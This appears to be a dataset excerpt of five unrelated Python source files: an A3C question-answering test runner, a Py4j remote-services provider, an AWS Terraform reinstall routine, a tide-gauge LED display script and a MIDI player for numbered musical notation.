source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
a3c_test.py
|
# -*- coding: utf-8 -*-
import pdb
import tensorflow as tf
import os
import threading
import numpy as np
import random
from networks.qa_planner_network import QAPlannerNetwork
from networks.free_space_network import FreeSpaceNetwork
from networks.end_to_end_baseline_network import EndToEndBaselineNetwork
from reinforcement_learning.a3c_testing_thread import A3CTestingThread
from utils import tf_util
from utils import py_util
import constants
def main():
if constants.OBJECT_DETECTION:
from darknet_object_detection import detector
detector.setup_detectors(constants.PARALLEL_SIZE)
with tf.device('/gpu:' + str(constants.GPU_ID)):
with tf.variable_scope('global_network'):
if constants.END_TO_END_BASELINE:
global_network = EndToEndBaselineNetwork()
else:
global_network = QAPlannerNetwork(constants.RL_GRU_SIZE, 1, 1)
global_network.create_net()
if constants.USE_NAVIGATION_AGENT:
with tf.variable_scope('nav_global_network') as net_scope:
free_space_network = FreeSpaceNetwork(constants.GRU_SIZE, 1, 1)
free_space_network.create_net()
else:
net_scope = None
# prepare session
sess = tf_util.Session()
if constants.PREDICT_DEPTH:
from depth_estimation_network import depth_estimator
with tf.variable_scope('') as depth_scope:
depth_estimator = depth_estimator.get_depth_estimator(sess)
else:
depth_scope = None
sess.run(tf.global_variables_initializer())
# Initialize pretrained weights after init.
if constants.PREDICT_DEPTH:
depth_estimator.load_weights()
testing_threads = []
for i in range(constants.PARALLEL_SIZE):
testing_thread = A3CTestingThread(i, sess, net_scope, depth_scope)
testing_threads.append(testing_thread)
tf_util.restore_from_dir(sess, constants.CHECKPOINT_DIR, True)
if constants.USE_NAVIGATION_AGENT:
print('now trying to restore nav model')
tf_util.restore_from_dir(sess, os.path.join(constants.CHECKPOINT_PREFIX, 'navigation'), True)
sess.graph.finalize()
question_types = constants.USED_QUESTION_TYPES
rows = []
for q_type in question_types:
curr_rows = list(range(len(testing_thread.agent.game_state.test_datasets[q_type])))
#curr_rows = list(range(8))
rows.extend(list(zip(curr_rows, [q_type] * len(curr_rows))))
random.shuffle(rows)
answers_correct = []
ep_lengths = []
ep_rewards = []
invalid_percents = []
time_lock = threading.Lock()
if not os.path.exists(constants.LOG_FILE):
os.makedirs(constants.LOG_FILE)
out_file = open(constants.LOG_FILE + '/results_' + constants.TEST_SET + '_' + py_util.get_time_str() + '.csv', 'w')
out_file.write(constants.LOG_FILE + '\n')
out_file.write('question_type, answer_correct, answer, gt_answer, episode_length, invalid_action_percent, scene number, seed, required_interaction\n')
def test_function(thread_ind):
testing_thread = testing_threads[thread_ind]
sess.run(testing_thread.sync)
#from game_state import QuestionGameState
#if testing_thread.agent.game_state is None:
#testing_thread.agent.game_state = QuestionGameState(sess=sess)
while len(rows) > 0:
time_lock.acquire()
if len(rows) == 0:
break
row = rows.pop()
time_lock.release()
answer_correct, answer, gt_answer, ep_length, ep_reward, invalid_percent, scene_num, seed, required_interaction = testing_thread.process(row)
question_type = row[1] + 1
time_lock.acquire()
output_str = ('%d, %d, %d, %d, %d, %f, %d, %d, %d\n' % (question_type, answer_correct, answer, gt_answer, ep_length, invalid_percent, scene_num, seed, required_interaction))
out_file.write(output_str)
out_file.flush()
answers_correct.append(int(answer_correct))
ep_lengths.append(ep_length)
ep_rewards.append(ep_reward)
invalid_percents.append(invalid_percent)
print('###############################')
print('ep ', row)
print('num episodes', len(answers_correct))
print('average correct', np.mean(answers_correct))
print('invalid percents', np.mean(invalid_percents), np.median(invalid_percents))
print('###############################')
time_lock.release()
test_threads = []
for i in range(constants.PARALLEL_SIZE):
test_threads.append(threading.Thread(target=test_function, args=(i,)))
for t in test_threads:
t.start()
for t in test_threads:
t.join()
out_file.close()
if __name__ == '__main__':
main()
|
py4j.py
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Py4j-based Distribution and Discovery Provider
:author: Scott Lewis
:copyright: Copyright 2020, Scott Lewis
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Scott Lewis
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from concurrent.futures import ThreadPoolExecutor
from queue import Queue
from threading import Thread, RLock
import logging
from osgiservicebridge.bridge import (
JavaServiceProxy,
Py4jServiceBridgeEventListener,
Py4jServiceBridge,
PythonService,
)
from osgiservicebridge.protobuf import (
ProtobufJavaServiceProxy,
ProtobufPythonService,
)
from py4j.java_gateway import GatewayParameters, CallbackServerParameters
from py4j.java_gateway import DEFAULT_PORT, DEFAULT_PYTHON_PROXY_PORT
# needed ipopo decorators
from pelix.ipopo.decorators import (
ComponentFactory,
Provides,
Instantiate,
Property,
Validate,
ValidateComponent,
Invalidate,
PostRegistration,
)
from pelix.ipopo.constants import (
ARG_BUNDLE_CONTEXT,
ARG_PROPERTIES,
)
# Providers API
from pelix.rsa import prop_dot_suffix
from pelix.rsa.providers.distribution import (
Container,
ExportContainer,
ImportContainer,
DistributionProvider,
SERVICE_EXPORT_CONTAINER,
SERVICE_IMPORT_CONTAINER,
SERVICE_EXPORT_DISTRIBUTION_PROVIDER,
SERVICE_IMPORT_DISTRIBUTION_PROVIDER,
)
from pelix.rsa.endpointdescription import EndpointDescription
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# Note: These must match the Java-side constants recored in Java interface
# class: org.eclipse.ecf.provider.py4j.Py4jConstants
ECF_PY4J_CONTAINER_CONFIG_TYPE = "ecf.py4j"
ECF_PY4J_NAMESPACE = "ecf.namespace.py4j"
ECF_PY4J_JAVA_HOST_CONFIG_TYPE = "ecf.py4j.host"
ECF_PY4J_JAVA_CONSUMER_CONFIG_TYPE = "ecf.py4j.consumer"
ECF_PY4J_PYTHON_HOST_CONFIG_TYPE = "ecf.py4j.host.python"
ECF_PY4J_PYTHON_CONSUMER_CONFIG_TYPE = "ecf.py4j.consumer.python"
ECF_PY4J_SUPPORTED_INTENTS = [
"exactlyOnce",
"passByReference",
"ordered",
"py4j",
"py4j.async",
"osgi.async",
"osgi.private",
]
# Protobuf
ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE = "ecf.py4j.protobuf.host"
ECF_PY4JPB_JAVA_CONSUMER_CONFIG_TYPE = "ecf.py4j.protobuf.consumer"
ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE = "ecf.py4j.python.protobuf.host"
ECF_PY4JPB_PYTHON_CONSUMER_CONFIG_TYPE = "ecf.py4j.python.protobuf.consumer"
ECF_PY4JPB_SUPPORTED_INTENTS = [
"exactlyOnce",
"passByReference",
"passByValue",
"ordered",
"py4j",
"py4j.protobuf",
"py4j.async",
"osgi.async",
"osgi.private",
]
ECF_PY4J_JAVA_PORT_PROP = "javaport"
ECF_PY4J_PYTHON_PORT_PROP = "pythonport"
ECF_PY4J_DEFAULT_SERVICE_TIMEOUT = "defaultservicetimeout"
# ------------------------------------------------------------------------------
@ComponentFactory(ECF_PY4J_CONTAINER_CONFIG_TYPE)
@Provides([SERVICE_EXPORT_CONTAINER, SERVICE_IMPORT_CONTAINER])
class Py4jContainer(ExportContainer, ImportContainer):
def __init__(self, max_workers=5):
ExportContainer.__init__(self)
ImportContainer.__init__(self)
self._max_workers = max_workers
self._executor = None
@ValidateComponent(ARG_BUNDLE_CONTEXT, ARG_PROPERTIES)
def _validate_component(self, bundle_context, container_props):
Container._validate_component(self, bundle_context, container_props)
self._executor = ThreadPoolExecutor(max_workers=self._max_workers)
@Invalidate
def _invalidate_component(self, _):
Container._invalidate_component(self, _)
if self._executor:
self._executor.shutdown()
self._executor = None
def get_connected_id(self):
return ExportContainer.get_connected_id(self)
def _export_service(self, svc, ed):
# pylint: disable=W0212
# modify svc class to have appropriate metadata for py4j
timeout = ed.get_osgi_basic_timeout()
if not timeout:
timeout = 30
args = [
self._get_distribution_provider()._get_bridge(),
ed.get_interfaces(),
svc,
self._executor,
timeout,
]
if (
ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE
in ed.get_remote_configs_supported()
):
clazz = ProtobufPythonService
else:
clazz = PythonService
psvc = clazz(*args)
self._get_distribution_provider()._get_bridge().export(
psvc, ed.get_properties()
)
ExportContainer._export_service(self, psvc, ed)
return True
def _unexport_service(self, ed):
# pylint: disable=W0212
dp = self._get_distribution_provider()
if dp:
bridge = dp._get_bridge()
if bridge:
bridge.unexport(ed.get_id())
ExportContainer._unexport_service(self, ed)
return True
def _prepare_proxy(self, endpoint_description):
# pylint: disable=W0212
# lookup the bridge proxy associated with the
# endpoint_description.get_id()
bridge = self._get_distribution_provider()._get_bridge()
proxy = bridge.get_import_endpoint(endpoint_description.get_id())[0]
timeout = endpoint_description.get_osgi_basic_timeout()
if not timeout:
timeout = self._container_props.get(
ECF_PY4J_DEFAULT_SERVICE_TIMEOUT, 30
)
args = [
bridge.get_jvm(),
endpoint_description.get_interfaces(),
proxy,
self._executor,
timeout,
]
clazz = JavaServiceProxy
if (
ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE
in endpoint_description.get_remote_configs_supported()
):
clazz = ProtobufJavaServiceProxy
return clazz(*args)
def unimport_service(self, endpoint_description):
# pylint: disable=W0212
dp = self._get_distribution_provider()
if dp:
bridge = dp._get_bridge()
if bridge:
bridge.remove_import_endpoint(endpoint_description.get_id())
ImportContainer.unimport_service(self, endpoint_description)
@ComponentFactory("py4j-distribution-provider-factory")
@Provides(
[SERVICE_EXPORT_DISTRIBUTION_PROVIDER, SERVICE_IMPORT_DISTRIBUTION_PROVIDER]
)
@Property("_config_name", "config_name", ECF_PY4J_CONTAINER_CONFIG_TYPE)
@Property("_namespace", "namespace", ECF_PY4J_NAMESPACE)
@Property(
"_supported_configs",
"supported_configs",
[ECF_PY4J_PYTHON_HOST_CONFIG_TYPE, ECF_PY4J_PYTHON_CONSUMER_CONFIG_TYPE],
)
@Property("_supported_intents", "supported_intents",
ECF_PY4J_SUPPORTED_INTENTS)
@Property(
"_supported_pb_intents",
"supported_pb_intents",
ECF_PY4JPB_SUPPORTED_INTENTS,
)
@Property(
"_javaport",
prop_dot_suffix(ECF_PY4J_CONTAINER_CONFIG_TYPE, ECF_PY4J_JAVA_PORT_PROP),
DEFAULT_PORT,
)
@Property(
"_pythonport",
prop_dot_suffix(ECF_PY4J_CONTAINER_CONFIG_TYPE, ECF_PY4J_PYTHON_PORT_PROP),
DEFAULT_PYTHON_PROXY_PORT,
)
@Property(
"_default_service_timeout",
prop_dot_suffix(
ECF_PY4J_CONTAINER_CONFIG_TYPE, ECF_PY4J_DEFAULT_SERVICE_TIMEOUT
),
30,
)
@Instantiate("py4j-distribution-provider")
class Py4jDistributionProvider(
DistributionProvider, Py4jServiceBridgeEventListener
):
def __init__(self):
super(Py4jDistributionProvider, self).__init__()
self._bridge = None
self._container = None
self._queue = Queue()
self._thread = Thread(target=self._worker)
self._thread.daemon = True
self._done = False
self._lock = RLock()
self._py4jcontainer = self._supported_pb_intents = None
self._javaport = self._pythonport = self._default_service_timeout = None
def _get_bridge(self):
return self._bridge
# Override of DistributionProvider._get_imported_configs. Returns
# the Py4j bridge.get_id() in list
def _get_imported_configs(self, exported_configs):
imported_configs = []
if ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE in exported_configs:
imported_configs.append(ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE)
if ECF_PY4J_JAVA_HOST_CONFIG_TYPE in exported_configs:
imported_configs.append(ECF_PY4J_PYTHON_HOST_CONFIG_TYPE)
return imported_configs
# Implementation of ImportDistributionProvider
def supports_import(self, exported_configs, service_intents, import_props):
# pylint: disable=W0613
if ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE in exported_configs:
if self._match_intents_supported(
service_intents, self._supported_pb_intents
):
return self._container
elif ECF_PY4J_JAVA_HOST_CONFIG_TYPE in exported_configs:
if self._match_intents(service_intents):
return self._container
return None
# Implementation of ExportDistributionProvider
def supports_export(self, exported_configs, service_intents, export_props):
# pylint: disable=W0613
if self._match_intents(service_intents):
if (
ECF_PY4J_PYTHON_HOST_CONFIG_TYPE in exported_configs
or ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE in exported_configs
):
return self._container
return None
@Validate
def _validate(self, _):
# here is where we can get java and python ports and change the
# defaults for connecting
try:
self._bridge = Py4jServiceBridge(
service_listener=self,
gateway_parameters=GatewayParameters(port=self._javaport),
callback_server_parameters=CallbackServerParameters(
port=self._pythonport
),
)
self._bridge.connect()
except Exception as e:
self._bridge = None
raise e
# Once bridge is connected, instantiate container using bridge id
container_props = self._prepare_container_props(
self._supported_intents, None
)
if self._default_service_timeout:
container_props[
ECF_PY4J_DEFAULT_SERVICE_TIMEOUT
] = self._default_service_timeout
self._container = self._ipopo.instantiate(
self._config_name, self._bridge.get_id(), container_props
)
@Invalidate
def _invalidate(self, _):
if self._bridge:
with self._lock:
# Set done flag to True
self._done = True
# Trigger reading from queue in self._worker
# with empty task
self._queue.put((None, None, None))
try:
self._ipopo.invalidate(self._bridge.get_id())
except ValueError:
pass
try:
self._bridge.disconnect()
except Exception:
pass
self._bridge = None
self._container = None
# Implementation of Py4jServiceBridgeEventListener
def service_imported(
self, servicebridge, endpointid, proxy, endpoint_props
):
# put on task queue so no blocking, but fifo delivery to rsa
# _logger.info('service_imported endpointid='+endpointid)
self._queue.put((endpointid, endpoint_props, self._handle_import))
def service_modified(
self, servicebridge, endpointid, proxy, endpoint_props
):
# _logger.info('_service_modified endpointid='+endpointid+";proxy="+str(proxy)+";endpoint_props="+str(endpoint_props))
self._queue.put(
(endpointid, endpoint_props, self._handle_import_update)
)
def service_unimported(
self, servicebridge, endpointid, proxy, endpoint_props
):
# _logger.info('_service_unimported endpointid='+endpointid+";proxy="+str(proxy)+";endpoint_props="+str(endpoint_props))
# put on task queue so no blocking, but fifo delivery to rsa
self._queue.put(
(endpointid,
endpoint_props,
self._handle_import_close))
@PostRegistration
def _post_reg(self, _):
# start the thread for processing import_service import requests
self._thread.start()
# this is method called by self._thread. All it does is
# read from queue, and import/unregister imported the discovered service
def _worker(self):
while True:
with self._lock:
# If self._done flag is set, return and that's it
if self._done:
return
# otherwise block to get items from queue placed by service_imported,
# service_modified, and service_unimported
# called by Py4j handler thread
item = self._queue.get()
f = None
try:
# get the function from item[2]
f = item[2]
except Exception:
logging.error("Exception getting code in item=%s", item)
if f:
try:
# get the endpoint description properties from item[1]
# and create EndpointDescription instance
ed = EndpointDescription(properties=item[1])
except Exception:
logging.error(
"Exception creating endpoint description from props=%s",
item[1],
)
else:
# call appropriate function
try:
f(ed)
except Exception:
logging.error("Exception invoking function=%s", f)
# no matter what, we are done with this task
self._queue.task_done()
|
reinstall.py
|
from core.config import Settings
from core.providers.aws.install import Install
from core import constants as K
from core.terraform import PyTerraform
from threading import Thread
from datetime import datetime
import os
import sys
class ReInstall(Install): # Do not inherit Destroy
"""
AWS provider for destroy command
Attributes:
executed_with_error (boolean): this is set to True if any error occurs
FOLDER_EXISTS_ERROR_NO (int): Error number of folder creation failure
install_statuses (dict): Available destroy statuses
terraform_thread (thread): Install python thread
terraform_outputs (dict): Terraform output dict
current_install_status (int): Current install status
"""
destroy = False
exception = None
def execute(self, resources_to_destroy, resources_to_install, terraform_with_targets, dry_run):
"""
This is the starting method where install begins. This is the actual method called from the main install class
Args:
resources (list): Resources to be installed
terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
dry_run (boolean): Decides whether original install should be done
"""
self.generate_terraform_files(resources_to_install, terraform_with_targets)
self.run_tf_execution_and_status_threads(resources_to_destroy, resources_to_install, terraform_with_targets, dry_run)
if not self.executed_with_error:
self.render_resource_outputs(resources_to_install)
else:
raise self.exception
def run_tf_execution_and_status_threads(self, resources_to_destroy, resources_to_install, terraform_with_targets, dry_run):
"""
Creates 2 thread
1. For actualy installation
2. For displaying the status of installation
Since python is interpreted language we need to create threads to display the status in one and actual process in another
Args:
resources (list): Resources to be installed
terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
dry_run (boolean): Decides whether original install should be done
"""
self.terraform_thread = Thread(
target=self.re_create_resources,
args=(list(resources_to_destroy), list(resources_to_install), terraform_with_targets, dry_run)
)
progressbar_thread = Thread(target=self.show_progress_status_all, args=(list(resources_to_install), terraform_with_targets, dry_run))
self.terraform_thread.start()
progressbar_thread.start()
self.terraform_thread.join()
progressbar_thread.join()
def re_create_resources(self, resources_to_destroy, resources_to_install, terraform_with_targets, dry_run):
"""
Start installing the resources by calling PyTerraform class destroy
Args:
resources (list): Resources to be created
terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
dry_run (boolean): Decides whether original install should be done
"""
try:
if not dry_run:
PyTerraform().terraform_destroy(resources_to_destroy)
self.destroy = True
self.terraform_apply(resources_to_install, terraform_with_targets, dry_run)
except Exception as e:
self.executed_with_error = True
self.exception = e
self.destroy = True # If there is any error in destroy set destroy to True
self._cleanup_installation_process(dry_run)
def show_progress_status_all(self, resources, terraform_with_targets, dry_run):
"""
Show the status of installation continously in this thread
Args:
resources (list): Resources to be created
terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
dry_run (boolean): Decides whether original install should be done
"""
self.render_terraform_destroy_progress() # Show destroy progress
self.show_progress_status(resources, terraform_with_targets, dry_run) # Show install progress
def render_terraform_destroy_progress(self):
"""Show the status of terraform init command execution"""
self.show_step_heading(K.TERRAFORM_REDEPLOY_DESTROY_STARTED, write_log=False)
start_time = datetime.now()
while self.destroy is False and self.terraform_thread.isAlive():
duration = self.CYAN_ANSI + self.get_duration(datetime.now() - start_time) + self.END_ANSI
message = "Time elapsed: %s" % duration
self.show_progress_message(message, 1.5)
end_time = datetime.now()
self.erase_printed_line()
if self.exception:
self.show_step_finish(K.TERRAFORM_DESTROY_ERROR, write_log=False, color=self.ERROR_ANSI)
else:
self.show_step_finish(K.TERRAFORM_REDEP_DESTROY_COMPLETED, write_log=False, color=self.GREEN_ANSI)
self.display_process_duration(start_time, end_time)
|
when_above.py
|
# --------------------------------------------------
# Copyright (C) 2020 Antonio Viesti (a.viesti@eutropia.it).
# Creative Commons CC BY (https://creativecommons.org/licenses/by/4.0/)
# --------------------------------------------------
# Mareografie (1) — When above — Alta e bassa marea.
#
# «Mareografie (1) — When above» gets the current sea level value nearby Italian sea towns, and draws it on a 8X8 LED panel, iteratively.
# A tide gauge — also known as mareograph, marigraph, sea-level recorder, or limnimeter — is a device for measuring the change in sea level (hydrometric_level).
# The Italian ISPRA National Tidegauge Network is composed of 36 monitoring stations — powered by solar panels — located in:
# Ancona
# Anzio
# Bari
# Cagliari
# Carloforte
# Catania
# Civitavecchia
# Crotone
# Gaeta
# Genova
# Ginostra
# Imperia
# La Spezia
# Lampedusa
# Livorno
# Marina di Campo
# Messina
# Napoli
# Ortona
# Otranto
# Palermo
# Palinuro
# Ponza
# Porto Empedocle
# Porto Torres
# Ravenna
# Reggio Calabria
# Salerno
# San Benedetto del Tronto
# Sciacca
# Strombolicchio
# Taranto
# Tremiti
# Trieste
# Valona
# Venezia
# Vieste
import logging
import time
from queue import Queue
from threading import Thread
from ispra_rmn.ispra_rmn_services import get_discretized_hydrometric_level_nearby
from led_panel.led_panel_drawings import draw_level, get_device_in_default_configuration
# Tide gauge geographical reference.
here = 'Bari'
# LED panel resolution.
dots = 8
# Hydrometric level queue.
level_queue = Queue()
# Gets and enqueues the hydrometric level value.
#
# Args:
# here: the tide gauge geographical reference.
# dots: the LED panel resolution.
# level_queue: the queue of hydrometric level values.
def get_hydrometric_level_nearby(here, dots, level_queue):
cuts = dots
while True:
level = get_discretized_hydrometric_level_nearby(here, cuts)
level_queue.put(level)
time.sleep(60*10) # TODO 60*5
# Dequeues and draws the hydrometric level value.
#
# Args:
# level_queue: the queue of hydrometric level values.
def draw_hydrometric_level(level_queue):
device = get_device_in_default_configuration()
level = 0
while True:
if not level_queue.empty():
level= level_queue.get()
if level > 0:
draw_level(device, level)
# Configure logging.
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Thread the ingesting and enqueuing of the hydrometric level.
thread_get_hydrometric_level_nearby = Thread(target = get_hydrometric_level_nearby, args = (here, dots, level_queue, ))
thread_get_hydrometric_level_nearby.setDaemon(True)
thread_get_hydrometric_level_nearby.start()
# Thread the dequeuing and drawing of the hydrometric level.
thread_draw_hydrometric_level = Thread(target = draw_hydrometric_level, args = (level_queue, ))
thread_draw_hydrometric_level.setDaemon(True)
thread_draw_hydrometric_level.start()
while True:
pass
# --------------------------------------------------
|
midi_player.py
|
# Created by Xinyu Zhu on 2020/12/23, 23:16
import pygame.midi
import time
import threading
from node.pianoNode.ply_standardlizer import auto_format_for_file
from node.pianoNode.music_visualizer import MusicDataManager
from common.io.file.PlainTextClient import read_io_file
class MidiPlayer:
def __init__(self):
# 对于简谱上的一个数, 实际的声调应该在基础音阶的基础上增加多少
self.unit_offset = {
"1": 0,
"2": 2,
"3": 4,
"4": 5,
"5": 7,
"6": 9,
"7": 11
}
# 播放器所使用的初始基础音阶, 60为midi对于C大调的1(哆)
self.base_freq = 60
self.offset = 0
# 根据简谱的调性, 播放器所使用的的基础音阶应该在初始基础音阶的基础上增加多少
self.key_offset = {
"C": 0,
"Db": 1,
"C#": 1,
"D": 2,
"Eb": 3,
"E": 4,
"F": 5,
"Gb": 6,
"F#": 6,
"G": 7,
"Ab": 8,
"A": 9,
"Bb": 10,
"B": 11,
"Cb": 11
}
# 每拍时间长度(s)
self.pt = 0.66
self.default_velocity = 127
# 4/4 拍, 主要影响每拍的强弱
self.beat = "4/4"
# 一般音乐本身有设计好拍子的感觉, 不需要刻意调强弱, 响度设置成一样的感觉比较好
self.strong_beat = 127
self.less_strong_beat = 127
self.weak_beat = 127
self.auto_close_instrument = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 47, 112, 113, 114, 115, 116,
117, 118, 119, 127, 45}
# 对于无法自动停止的乐器, 在n个节拍后强制停止
self.auto_close_duration_index = 1
self.default_instrument = [0]
# 用于发声的midi模块初始化
pygame.midi.init()
self.output = pygame.midi.Output(pygame.midi.get_default_output_id())
self.ins_to_channel = {
0: 0
}
self.next_channel = 1
self.data_manager = MusicDataManager()
# 是否固定使用默认乐器而不根据乐谱调整
self.force_instrument = False
self.force_to = 0
def choose_from_default_instrument(self, channel_index):
index = int(channel_index * len(self.default_instrument))
# print(channel_index, self.default_instrument, index)
return self.default_instrument[index]
def get_channel_for_instrument(self, instrument):
return 0
# if instrument in self.ins_to_channel:
# return self.ins_to_channel[instrument]
# else:
# self.ins_to_channel[instrument] = self.next_channel
# self.next_channel += 1
# if self.next_channel > 15:
# self.next_channel = 1
# return self.ins_to_channel[instrument]
def auto_play_and_close(self, note, velocity=127, duration=2, channel=0):
self.output.note_on(note, velocity, channel)
time.sleep(duration)
self.output.note_off(note, velocity, channel)
def play_single_note(self, instrument, note, velocity, duration=-1.0, channel_index=0):
self.output.set_instrument(instrument, channel_index)
if duration == -1.0:
self.output.note_on(note, velocity, channel_index)
else:
threading.Thread(target=self.auto_play_and_close,
args=(note, velocity, duration, channel_index)).start()
def play_note(self, note):
for note_number in note["note"]:
if note_number > 0:
if note["ins"] in self.auto_close_instrument:
self.play_single_note(note["ins"], note_number, note["velocity"], -1.0,
self.get_channel_for_instrument(note["ins"]))
else:
self.play_single_note(note["ins"], note_number, note["velocity"],
self.pt * self.auto_close_duration_index,
self.get_channel_for_instrument(note["ins"]))
time.sleep(self.pt / len(note["note"]))
def play_chord(self, notes):
threads = []
for i, note in enumerate(notes):
threads.append(
threading.Thread(target=self.play_note, args=(note,)))
[thr.start() for thr in threads]
[thr.join() for thr in threads]
def play_section(self, list_of_notes: list):
for notes in list_of_notes:
#print(notes)
self.play_chord(notes)
def single_note_to_num(self, single_note: str):
"""
将简谱中的单个音阶装换为实际频率代码
支持的规则: 1: 普通的音阶, 1#: 升半调, .1: 升7度, 1..: 降两个7度, 1..#或者1#..: 降两个7度后升半调
.1.: 会被解析为升两个7度, .1##.: 会忽略重复的#, 被解析为..1#
不支持: .8.: 不在1~7的范围内, 返回-1, 不会播放, @1: 含有不合法字符, 返回-1 不会播放
"""
# 以.开头视为需要升若干个7度, 否则需要降
should_increase_7 = (single_note[0] == ".")
# 具体升降多少个7度看.的个数
cycle_should_change = single_note.count(".")
# 去除.和#之后的字符视为要播放的音阶
unit_key = single_note.replace(".", "").replace("#", "")
if unit_key in self.unit_offset:
unit_key_freq = self.base_freq + self.unit_offset[unit_key] + self.offset * 12
else:
return -1
if "#" in single_note:
unit_key_freq += 1
if should_increase_7:
unit_key_freq += cycle_should_change * 12
else:
unit_key_freq -= cycle_should_change * 12
return unit_key_freq
def note_str_to_note(self, note_str: str) -> list:
"""
将类似 1_2. 这种有联系的多个音符转成一个数组, 每个数组中全部音阶播放的完的时间会相同, 也就是一个拍的时间
多个拍组成一个音轨的一个小节(segment), 4/4拍的音乐中, 4拍为一节
多个音轨组成的一个小节, 我们叫做一节(section), 也就是我们编写音乐中的一行, 播放时一节一节地解析播放
单个音节也能形成一个长度为1的数组
"""
result = []
for single_unit in note_str.split("_"):
result.append(self.single_note_to_num(single_unit))
return result
def parse_section_channel(self, channel_str: str, channel_index: float) -> list:
# 规定在每个channel后面可以用方括号设定该channel的属性(乐器, 响度等)
local_attr_str = ""
if "[" in channel_str:
local_attr_str = channel_str[channel_str.index("[") + 1:channel_str.index("]")]
channel_str = channel_str[0:channel_str.index("[")]
channel_str = channel_str.strip()
attr = self.get_attr_from_str(local_attr_str, channel_index)
result = []
for note_str in channel_str.split():
note = {
"ins": self.force_to if self.force_instrument else attr["ins="],
"note": self.note_str_to_note(note_str),
"velocity": attr["vol="]
}
result.append(note)
return result
def parse_repeated_channel(self, channel, last_channel, channel_index: float):
channel = channel.strip()
should_increase_note = 1 if channel.startswith(".") else -1
increase_count = channel.count(".")
this_channel = []
for channel_note in last_channel:
base_notes = channel_note["note"]
new_notes = []
for note in base_notes:
if note > 0:
new_notes.append(note + increase_count * 12 * should_increase_note)
else:
new_notes.append(note)
this_channel_node = {
"ins": self.force_to if self.force_instrument else channel_note["ins"],
"note": new_notes,
"velocity": channel_note["velocity"]
}
this_channel.append(this_channel_node)
return this_channel
def parse_section(self, section_str: str):
result = []
total_channel_num = section_str.count("|") + 1
for i, channel in enumerate(section_str.split("|")):
if "*" in channel:
result.append(self.parse_repeated_channel(channel, result[-1], i / total_channel_num))
else:
result.append(self.parse_section_channel(channel, i / total_channel_num))
re_arranged_result = []
for i in range(len(result[0])):
buffer = []
for j in range(len(result)):
if i >= len(result[j]):
print("Error in channel length:", section_str)
print(section_str.split("|")[j])
buffer.append(result[j][i])
re_arranged_result.append(buffer)
return re_arranged_result
def get_attr_from_str(self, attr="", channel_index=0):
base_attr = {
"1=": self.base_freq,
"p=": self.beat,
"pm=": self.pt,
"offset=": self.offset,
"ins=": self.choose_from_default_instrument(channel_index),
"vol=": self.default_velocity
}
attrs = attr.split(",")
for attr_unit in attrs:
attr_unit = attr_unit.replace(" ", "")
if "1=" in attr_unit:
key = attr_unit.replace("1=", "").strip()
base_attr["1="] = 60 + self.key_offset[key]
elif "p=" in attr_unit:
base_attr["p="] = attr_unit.replace("p=", "").strip()
elif "pm=" in attr_unit:
base_attr["pm="] = 60 / int(attr_unit.replace("pm=", ""))
elif "offset=" in attr_unit:
base_attr["offset="] = int(attr_unit.replace("offset=", ""))
elif "ins=" in attr_unit:
base_attr["ins="] = int(attr_unit.replace("ins=", ""))
elif "vol=" in attr_unit:
base_attr["vol="] = int(attr_unit.replace("vol=", ""))
return base_attr
def set_attr(self, attr: str):
attrs = attr.split(",")
for attr_unit in attrs:
self.set_attr_unit(attr_unit)
def set_attr_unit(self, attr_unit: str):
attr_unit = attr_unit.replace(" ", "")
if "1=" in attr_unit:
key = attr_unit.replace("1=", "").strip()
self.base_freq = 60 + self.key_offset[key]
elif "p=" in attr_unit:
self.beat = attr_unit.replace("p=", "").strip()
elif "pm=" in attr_unit:
self.pt = 60 / int(attr_unit.replace("pm=", ""))
elif "offset=" in attr_unit:
self.offset = int(attr_unit.replace("offset=", ""))
elif "ins=" in attr_unit:
ins_content = attr_unit.replace("ins=", "")
# support things like: ins = (1|2|3)
if "(" not in ins_content:
self.default_instrument = [int(ins_content)]
else:
ins_content = ins_content.replace("(", "").replace(")", "")
self.default_instrument = []
for ins in ins_content.split("|"):
self.default_instrument.append(int(ins))
elif "vol=" in attr_unit:
self.default_velocity = int(attr_unit.replace("vol=", ""))
def stream_music(self, music_sheet: list):
play = True
for line in music_sheet:
if "//" in line:
# 跳过注释
continue
if "<" in line:
# 跳过播放
play = False
continue
if ">" in line:
# 开始播放
play = True
continue
if "=" in line and "[" not in line:
# 设置全局属性
self.set_attr(line)
continue
if play and line != "":
print(line)
self.play_section(self.parse_section(line))
def compile_music(self, music_sheet: list):
self.data_manager.init()
for line in music_sheet:
if "//" in line or "<" in line or ">" in line:
# 跳过注释
continue
if "=" in line and "[" not in line:
# 设置全局属性
self.set_attr(line)
continue
if line != "":
self.data_manager.parse_music(self.parse_section(line), self.pt, self.base_freq)
self.data_manager.output_current()
def play_file(self, filename):
auto_format_for_file(filename)
data = read_io_file(filename)
self.compile_music(data.split("\n"))
self.stream_music(data.split("\n"))
def close(self):
self.output.close()
from common.io.file import project_root
if __name__ == '__main__':
player = MidiPlayer()
player.force_instrument = True
player.play_file("yuxitan.ply")
